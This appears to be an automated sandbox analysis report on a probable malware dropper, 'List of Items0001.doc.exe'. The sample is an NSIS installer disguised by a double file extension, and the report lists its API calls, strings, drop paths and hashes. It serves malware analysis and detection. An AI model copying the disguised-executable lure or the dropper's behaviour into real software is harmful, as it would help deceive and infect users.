                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                • String ID: "C:\Users\user\Desktop\List of Items0001.doc.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Raveler22$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Raveler22$C:\Users\user\Desktop$C:\Users\user\Desktop\List of Items0001.doc.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                • API String ID: 3859024572-43755930
                                                • Opcode ID: 7661b2740962a4f112584f7e598b5b298a42e845d6f3323427e92d6f86dfce5e
                                                • Instruction ID: d56582c8b11bee4b9d4e83ad1f604629a9588d533935b381636b20c84fba3529
                                                • Opcode Fuzzy Hash: 7661b2740962a4f112584f7e598b5b298a42e845d6f3323427e92d6f86dfce5e
                                                • Instruction Fuzzy Hash: D4E1F471A00214AADB20AFB58D45A6E3EB8EB05709F50847FF945B32D1DB7C8A41CB6D

                                                Control-flow Graph (graph not preserved; first listed block 405809-405824)
                                                APIs
                                                • GetDlgItem.USER32(?,00000403), ref: 00405867
                                                • GetDlgItem.USER32(?,000003EE), ref: 00405876
                                                • GetClientRect.USER32(?,?), ref: 004058B3
                                                • GetSystemMetrics.USER32(00000002), ref: 004058BA
                                                • SendMessageW.USER32(?,00001061,00000000,?), ref: 004058DB
                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004058EC
                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004058FF
                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040590D
                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405920
                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405942
                                                • ShowWindow.USER32(?,00000008), ref: 00405956
                                                • GetDlgItem.USER32(?,000003EC), ref: 00405977
                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405987
                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059A0
                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059AC
                                                • GetDlgItem.USER32(?,000003F8), ref: 00405885
                                                  • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                • GetDlgItem.USER32(?,000003EC), ref: 004059C9
                                                • CreateThread.KERNEL32(00000000,00000000,Function_0000579D,00000000), ref: 004059D7
                                                • CloseHandle.KERNELBASE(00000000), ref: 004059DE
                                                • ShowWindow.USER32(00000000), ref: 00405A02
                                                • ShowWindow.USER32(?,00000008), ref: 00405A07
                                                • ShowWindow.USER32(00000008), ref: 00405A51
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405A85
                                                • CreatePopupMenu.USER32 ref: 00405A96
                                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405AAA
                                                • GetWindowRect.USER32(?,?), ref: 00405ACA
                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405AE3
                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B1B
                                                • OpenClipboard.USER32(00000000), ref: 00405B2B
                                                • EmptyClipboard.USER32 ref: 00405B31
                                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B3D
                                                • GlobalLock.KERNEL32(00000000), ref: 00405B47
                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B5B
                                                • GlobalUnlock.KERNEL32(00000000), ref: 00405B7B
                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00405B86
                                                • CloseClipboard.USER32 ref: 00405B8C
                                                Strings
                                                Similarity
                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                • String ID: H7B${
                                                • API String ID: 590372296-2256286769
                                                • Opcode ID: 153ff5dc364a6c7c2e50f1b489f7107bf33a64f1d0900c26a8f10ec1720b826b
                                                • Instruction ID: d0bbb34d81c2c7a38b5cdb5171fa906e4f4201ee6cbe22cb0b3272b57562556b
                                                • Opcode Fuzzy Hash: 153ff5dc364a6c7c2e50f1b489f7107bf33a64f1d0900c26a8f10ec1720b826b
                                                • Instruction Fuzzy Hash: D8B137B0900608FFDF119FA0DD89AAE7B79FB08354F00417AFA45A61A0CB755E52DF68

                                                Control-flow Graph (graph not preserved; first listed block 405d74-405d9a)
                                                APIs
                                                • DeleteFileW.KERNELBASE(?,?,76693420,76692EE0,00000000), ref: 00405D9D
                                                • lstrcatW.KERNEL32(00425750,\*.*,00425750,?,?,76693420,76692EE0,00000000), ref: 00405DE5
                                                • lstrcatW.KERNEL32(?,0040A014,?,00425750,?,?,76693420,76692EE0,00000000), ref: 00405E08
                                                • lstrlenW.KERNEL32(?,?,0040A014,?,00425750,?,?,76693420,76692EE0,00000000), ref: 00405E0E
                                                • FindFirstFileW.KERNELBASE(00425750,?,?,?,0040A014,?,00425750,?,?,76693420,76692EE0,00000000), ref: 00405E1E
                                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EBE
                                                • FindClose.KERNEL32(00000000), ref: 00405ECD
                                                Strings
                                                Similarity
                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                • String ID: .$.$PWB$\*.*
                                                • API String ID: 2035342205-2468439962
                                                • Opcode ID: 474154096caf6e50bc49cf7df5fd00662d051eb5e935454ecd5fbb37efa04323
                                                • Instruction ID: 3801e3340fbbb9c460ab277ab089a7ece50ce31247a5b640c745bca9484d7288
                                                • Opcode Fuzzy Hash: 474154096caf6e50bc49cf7df5fd00662d051eb5e935454ecd5fbb37efa04323
                                                • Instruction Fuzzy Hash: 46410330800A15AADB21AB61CC49BBF7678EF41715F50413FF881711D1DB7C4A82CEAE
                                                APIs
                                                • FindFirstFileW.KERNELBASE(?,00426798,00425F50,00406088,00425F50,00425F50,00000000,00425F50,00425F50, 4iv.iv,?,76692EE0,00405D94,?,76693420,76692EE0), ref: 004069A9
                                                • FindClose.KERNEL32(00000000), ref: 004069B5
                                                Similarity
                                                • API ID: Find$CloseFileFirst
                                                • String ID:
                                                • API String ID: 2295610775-0
                                                • Opcode ID: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                                • Instruction ID: 0ca7534fdffec89160a31ceabb6ef5ff718bfc83d1618d69d17f9e635378cbc3
                                                • Opcode Fuzzy Hash: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                                • Instruction Fuzzy Hash: 5ED012B15192205FC34057387E0C84B7A989F563317268A36B4AAF11E0CB348C3297AC

                                                Control-flow Graph (graph not preserved; first listed block 4040c5-4040d7)
                                                APIs
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404101
                                                • ShowWindow.USER32(?), ref: 00404121
                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404133
                                                • ShowWindow.USER32(?,00000004), ref: 0040414C
                                                • DestroyWindow.USER32 ref: 00404160
                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404179
                                                • GetDlgItem.USER32(?,?), ref: 00404198
                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041AC
                                                • IsWindowEnabled.USER32(00000000), ref: 004041B3
                                                • GetDlgItem.USER32(?,00000001), ref: 0040425E
                                                • GetDlgItem.USER32(?,00000002), ref: 00404268
                                                • SetClassLongW.USER32(?,000000F2,?), ref: 00404282
                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004042D3
                                                • GetDlgItem.USER32(?,00000003), ref: 00404379
                                                • ShowWindow.USER32(00000000,?), ref: 0040439A
                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004043AC
                                                • EnableWindow.USER32(?,?), ref: 004043C7
                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004043DD
                                                • EnableMenuItem.USER32(00000000), ref: 004043E4
                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004043FC
                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040440F
                                                • lstrlenW.KERNEL32(00423748,?,00423748,00000000), ref: 00404439
                                                • SetWindowTextW.USER32(?,00423748), ref: 0040444D
                                                • ShowWindow.USER32(?,0000000A), ref: 00404581
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                • String ID: H7B
                                                • API String ID: 121052019-2300413410
                                                • Opcode ID: 2f4dad2f818047668635e16f952da299a81014d83ff1599baf972819d0fbfd0c
                                                • Instruction ID: 1d4a55fced449df2e2a9dfc159c1061f424388fbea236c5341ec002980a30b6c
                                                • Opcode Fuzzy Hash: 2f4dad2f818047668635e16f952da299a81014d83ff1599baf972819d0fbfd0c
                                                • Instruction Fuzzy Hash: C0C1C2B1600604FBDB216F61EE85E2A3B78EB85745F40097EF781B51F0CB3958529B2E

                                                Control-flow Graph (first block 403d17-403d2f)
                                                APIs
                                                  • Part of subcall function 00406A35: GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                                  • Part of subcall function 00406A35: GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                                • lstrcatW.KERNEL32(1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,76693420,C:\Users\user\AppData\Local\Temp\,?,00000000,?), ref: 00403D98
                                                • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Raveler22,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,76693420), ref: 00403E18
                                                • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Raveler22,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403E2B
                                                • GetFileAttributesW.KERNEL32(Call,?,00000000,?), ref: 00403E36
                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Raveler22), ref: 00403E7F
                                                  • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                                • RegisterClassW.USER32(00429200), ref: 00403EBC
                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403ED4
                                                • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403F09
                                                • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403F3F
                                                • GetClassInfoW.USER32(00000000,RichEdit20W,00429200), ref: 00403F6B
                                                • GetClassInfoW.USER32(00000000,RichEdit,00429200), ref: 00403F78
                                                • RegisterClassW.USER32(00429200), ref: 00403F81
                                                • DialogBoxParamW.USER32(?,00000000,004040C5,00000000), ref: 00403FA0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Raveler22$Call$Control Panel\Desktop\ResourceLocale$H7B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                • API String ID: 1975747703-3960379151
                                                • Opcode ID: 220f140aa4de50ee9124e2eb98a4ec8a38239a674bfba3edeef84c1295dabbb0
                                                • Instruction ID: e235badc60aeba35c86cf297cd954ec43a22164425911800af60bc979c7621a1
                                                • Opcode Fuzzy Hash: 220f140aa4de50ee9124e2eb98a4ec8a38239a674bfba3edeef84c1295dabbb0
                                                • Instruction Fuzzy Hash: E661D570640201BAD730AF66AD45E2B3A7CEB84B49F40457FF945B22E1DB3D5911CA3D

                                                Control-flow Graph (first block 4030d0-40311e)
                                                APIs
                                                • GetTickCount.KERNEL32 ref: 004030E4
                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\List of Items0001.doc.exe,00000400), ref: 00403100
                                                  • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\List of Items0001.doc.exe,80000000,00000003), ref: 0040615C
                                                  • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\List of Items0001.doc.exe,C:\Users\user\Desktop\List of Items0001.doc.exe,80000000,00000003), ref: 00403149
                                                • GlobalAlloc.KERNELBASE(00000040,?), ref: 0040328B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\List of Items0001.doc.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                • API String ID: 2803837635-667659242
                                                • Opcode ID: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                                                • Instruction ID: 6a7077609e6cbe8902eef3654a796be60faa9129f620d49927b75729aeb44cd1
                                                • Opcode Fuzzy Hash: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                                                • Instruction Fuzzy Hash: 74710271A40204ABDB20DFB5DD85B9E3AACAB04315F21457FF901B72D2CB789E418B6D

                                                Control-flow Graph (first block 4066a5-4066b0)
                                                APIs
                                                • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004067C0
                                                • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,?,00405701,Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,00000000,00000000,00000000,00000000), ref: 004067D3
                                                • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,?,00405701,Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,00000000), ref: 004068A4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: Directory$SystemWindowslstrcatlstrlen
                                                • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                • API String ID: 4260037668-3511794663
                                                • Opcode ID: a56a8a4d956183f5ceef7ff9e42496adb417aa599aaeb911d527621cdebcfcc9
                                                • Instruction ID: 414c90a3e727c3679fd522760d05a71ccfd37451a898d0680c6fb4b4ce958948
                                                • Opcode Fuzzy Hash: a56a8a4d956183f5ceef7ff9e42496adb417aa599aaeb911d527621cdebcfcc9
                                                • Instruction Fuzzy Hash: CD61E172A02115EBDB20AF64CD40BAA37A5EF10314F22C13EE946B62D0DB3D49A1CB5D

                                                Control-flow Graph (first block 40176f-401794)
                                                APIs
                                                • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Raveler22,?,?,00000031), ref: 004017B0
                                                • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Raveler22,?,?,00000031), ref: 004017D5
                                                  • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                                  • Part of subcall function 004056CA: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                  • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                  • Part of subcall function 004056CA: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,004030A8,004030A8,Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,00000000,00000000,00000000), ref: 00405725
                                                  • Part of subcall function 004056CA: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll), ref: 00405737
                                                  • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                  • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                  • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                • String ID: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp$C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Raveler22$Call
                                                • API String ID: 1941528284-2054544112
                                                • Opcode ID: ae146eaacdef0e831c8dd449aef3ef234919e16d41b91f58e4b486bba6a2989e
                                                • Instruction ID: 87dd38174d63fc88252c3cacf76d35d2aef1a13c6195c1d88e2760da23471212
                                                • Opcode Fuzzy Hash: ae146eaacdef0e831c8dd449aef3ef234919e16d41b91f58e4b486bba6a2989e
                                                • Instruction Fuzzy Hash: DE41B771500205BACF10BBB5CD85DAE7A75EF45328B20473FF422B21E1D63D89619A2E

                                                Control-flow Graph (first block 4056ca-4056df)
                                                APIs
                                                • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                • lstrlenW.KERNEL32(004030A8,Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,004030A8,004030A8,Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,00000000,00000000,00000000), ref: 00405725
                                                • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll), ref: 00405737
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                  • Part of subcall function 004066A5: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                  • Part of subcall function 004066A5: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,?,00405701,Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,00000000), ref: 004068A4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll
                                                • API String ID: 1495540970-3543539532

                                                APIs
                                                • ReadFile.KERNELBASE(?,?,?,?), ref: 00402758
                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                                  • Part of subcall function 00406239: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040624F
                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: File$Pointer$ByteCharMultiWide$Read
                                                • String ID: 9
                                                • API String ID: 163830602-2366072709

                                                APIs
                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                                • wsprintfW.USER32 ref: 00406A17
                                                • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406A2B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                • String ID: %s%S.dll$UXTHEME$\
                                                • API String ID: 2200240437-1946221925

                                                APIs
                                                • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                                                • GetLastError.KERNEL32 ref: 00405BF0
                                                • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405C05
                                                • GetLastError.KERNEL32 ref: 00405C0F
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BBF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 3449924974-787714339

                                                APIs
                                                • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: CloseEnum$DeleteValue
                                                • String ID:
                                                • API String ID: 1354259210-0

                                                APIs
                                                  • Part of subcall function 6DB61BFF: GlobalFree.KERNEL32(?), ref: 6DB61E74
                                                  • Part of subcall function 6DB61BFF: GlobalFree.KERNEL32(?), ref: 6DB61E79
                                                  • Part of subcall function 6DB61BFF: GlobalFree.KERNEL32(?), ref: 6DB61E7E
                                                • GlobalFree.KERNEL32(00000000), ref: 6DB618C5
                                                • FreeLibrary.KERNEL32(?), ref: 6DB6194B
                                                • GlobalFree.KERNEL32(00000000), ref: 6DB61970
                                                  • Part of subcall function 6DB6243E: GlobalAlloc.KERNEL32(00000040,?), ref: 6DB6246F
                                                  • Part of subcall function 6DB62810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6DB61896,00000000), ref: 6DB628E0
                                                  • Part of subcall function 6DB61666: wsprintfW.USER32 ref: 6DB61694
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674065859400.000000006DB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DB60000, based on PE: true
                                                Similarity
                                                • API ID: Global$Free$Alloc$Librarywsprintf
                                                • String ID:
                                                • API String ID: 3962662361-3916222277

                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402103
                                                  • Part of subcall function 004056CA: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                  • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                  • Part of subcall function 004056CA: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,004030A8,004030A8,Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,00000000,00000000,00000000), ref: 00405725
                                                  • Part of subcall function 004056CA: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll), ref: 00405737
                                                  • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                  • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                  • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402114
                                                • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402191
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                • String ID: ^
                                                • API String ID: 334405425-4142473408
                                                APIs
